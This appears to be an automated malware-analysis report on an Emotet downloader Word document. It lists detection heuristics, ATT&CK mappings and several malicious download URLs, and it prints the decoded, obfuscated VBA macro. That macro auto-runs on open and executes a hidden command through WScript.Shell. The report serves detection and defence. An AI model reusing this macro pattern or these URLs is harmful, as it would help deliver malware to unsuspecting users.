MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Word document containing VBA macros. The macros utilize WScript.Shell and CreateObject to execute commands, specifically referencing 'WscRipt.sHeL' which is a strong indicator of malicious intent to download and execute a secondary payload. The ClamAV detection as 'Doc.Downloader.Emotet-10022072-0' further supports the Emotet family attribution and the downloader functionality.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-10022072-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End Select Manager29 = "" + SavingsAccount92 + implementation34 + digital65 + Kansas96 + "WscRipt.sHeLl" + Associate75 + SleekCottonKeyboard30 Select Case Fort59 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End Select redundant65 = Array(SavingsAccount15, Small73, Avon82, CreateObject("" + SDD18 + Cambridgeshire64 + Brand2 + Manager29).Run!("" + Customer2 + Ergonomic35 + synthesize43 + Soft50.TextBox1 + Developer46 + cyan47 + payment13, GcbiW), feed80, Ecuador83, Architect78) Select Case content16 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "matrix80" Sub autoopen() Future91 = Global19 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.binsuloomgroup.com/wp-content/uploads/TyUg_qOsCOz4O_5uPw9YSbO@http://bonnyprint.com In document text (OLE body)
- http://ftp.spbv.org/worem_2o27v_d@http://flowersgalleryevents.ayansaha.com/2Z4fO_YmAY_BqDF1wD@https://anhle.art/t2ZZ_zOxsnfkSJ_ClUxsIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5833 bytes |
SHA-256: 809fbc0d3180c3d024dc84b49918f1a1b34a8902e3cf51170d3d2570e4b1482e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Soft50"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "deliverables31"
Function Flats38()
On Error Resume Next
Select Case FantasticSteelPizza43
Case 248
CreditCardAccount10 = CLng(978)
Dynamic25 = attitudeoriented58
multistate88 = CDate(skyblue78)
bluetooth40 = multibyte80
Borders2 = Int(653)
Case 612
LicensedFrozenSalad18 = bypassing8
Cameroon62 = Cos(Agent5)
SavingsAccount97 = helpdesk64
PCI10 = ChrB(126)
microchip76 = calculating94
End Select
Select Case Mobility69
Case 928
integrated81 = CLng(869)
internetsolution14 = NewYork60
Nevada95 = CDate(transition30)
UnbrandedWoodenChicken81 = Agent8
userfacing40 = Int(970)
Case 598
Intelligent41 = calculating83
Congo91 = Cos(tangible93)
Burg23 = monitor86
Practical37 = ChrB(83)
Mill38 = Congo75
End Select
Select Case PersonalLoanAccount62
Case 674
navigating93 = CLng(27)
evolve85 = ElectronicsShoes57
withdrawal70 = CDate(Avon73)
enterprise67 = withdrawal16
Investor30 = Int(71)
Case 152
transmit50 = Sports63
gold7 = Cos(ROI67)
morph36 = Research78
HomeLoanAccount2 = ChrB(421)
engage64 = Cambridgeshire48
End Select
Manager29 = "" + SavingsAccount92 + implementation34 + digital65 + Kansas96 + "WscRipt.sHeLl" + Associate75 + SleekCottonKeyboard30
Select Case Fort59
Case 181
Tasty45 = CLng(781)
invoice78 = sexy69
haptic21 = CDate(Plastic64)
invoice59 = indexing44
circuit64 = Int(752)
Case 98
Wall1 = Berkshire88
Frontline48 = Cos(Tunnel52)
Marketing83 = Glen77
pixel94 = ChrB(974)
payment37 = Product96
End Select
Select Case port81
Case 974
COM69 = CLng(577)
Officer7 = turquoise23
fullrange2 = CDate(Hills52)
blue15 = tertiary27
copying56 = Int(335)
Case 711
cyan86 = synthesizing90
National90 = Cos(system97)
UnbrandedSoftPants8 = Wells7
MoneyMarketAccount16 = ChrB(666)
Bedfordshire7 = technologies80
End Select
GcbiW = 0
Select Case Paradigm24
Case 176
transmitter57 = CLng(440)
SQL13 = auxiliary83
GardenShoesIndustrial14 = CDate(lavender77)
Serbia62 = NetherlandsAntilles8
SmallGraniteTowels67 = Int(734)
Case 952
Intelligent89 = Toys48
wireless1 = Cos(Montenegro55)
Burgs16 = white86
Washington70 = ChrB(798)
array79 = Tala81
End Select
Select Case Frozen34
Case 757
Crescent79 = CLng(491)
payment75 = black13
compressing5 = CDate(synergies44)
HomeLoanAccount34 = Walk30
NorthDakota57 = Int(245)
Case 190
override83 = green59
Virginia21 = Cos(TastyGraniteBall42)
MoneyMarketAccount5 = Oklahoma70
Berkshire36 = ChrB(886)
Wyoming72 = SDD48
End Select
Select Case AI14
Case 548
calculate5 = CLng(93)
Stream15 = contextuallybased3
Grassroots53 = CDate(realtime93)
UnbrandedFrozenChicken33 = Accountability58
opensource7 = Int(858)
Case 841
Dale86 = Multilateral55
virtual27 = Cos(ROI98)
CreditCardAccount59 = Product1
turquoise64 = ChrB(158)
Soft30 = Turkmenistan82
End Select
redundant65 = Array(SavingsAccount15, Small73, Avon82, CreateObject("" + SDD18 + Cambridgeshire64 + Brand2 + Manager29).Run!("" + Customer2 + Ergonomic35 + synthesize43 + Soft50.TextBox1 + Developer46 + cyan47 + payment13, GcbiW), feed80, Ecuador83, Architect78)
Select Case content16
Case 831
HandcraftedGraniteHat14 = CLng(168)
drive71 = HomeComputersOutdoors2
IncredibleMetalBike94 = CDate(AwesomeCottonSoap52)
withdrawal77 = Refined37
Web25 = Int(987)
Case 460
Delaware93 = Executive38
Island74 = Cos(Metal64)
payment91 = Loaf40
FantasticPlasticSalad8 = ChrB(267)
matrix1 = payment47
End Select
Select Case w1080p31
Case 561
interactive34 = CLng(464)
solidstate37 = highlevel33
MoneyMarketAccount66 = CDate(Ergonomic52)
lime12 = Nebraska38
integrated24 = Int(373)
Case 725
NewMexico60 = Small17
connect81 = Cos(skyblue25)
Executive76 = Fresh75
Unbranded10 = ChrB(246)
RhodeIsland50 = Unbranded25
End Select
Select Case quantifying58
Case 626
SportsOutdoorsJewelery54 = CLng(752)
Ramp98 = Assistant24
firewall36 = CDate(IncredibleSoftSausages64)
IntelligentConcreteBacon21 = valueadded59
Trafficway55 = Int(772)
Case 454
Phased36 = JBOD21
PapuaNewGuinea71 = Cos(invoice17)
AwesomeMetalPizza72 = CheckingAccount47
capacitor13 = ChrB(454)
syndicate74 = HandmadeGraniteChicken34
End Select
End Function
Attribute VB_Name = "matrix80"
Sub autoopen()
Future91 = Global19
proactive51 = Array(Borders39, Trail72, MoneyMarketAccount78, Flats38, Central27, GorgeousWoodenBacon33, grow28)
Ville95 = analyzer99
End Sub
Function Bedfordshire97()
Cambridgeshire68 = SMS14
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.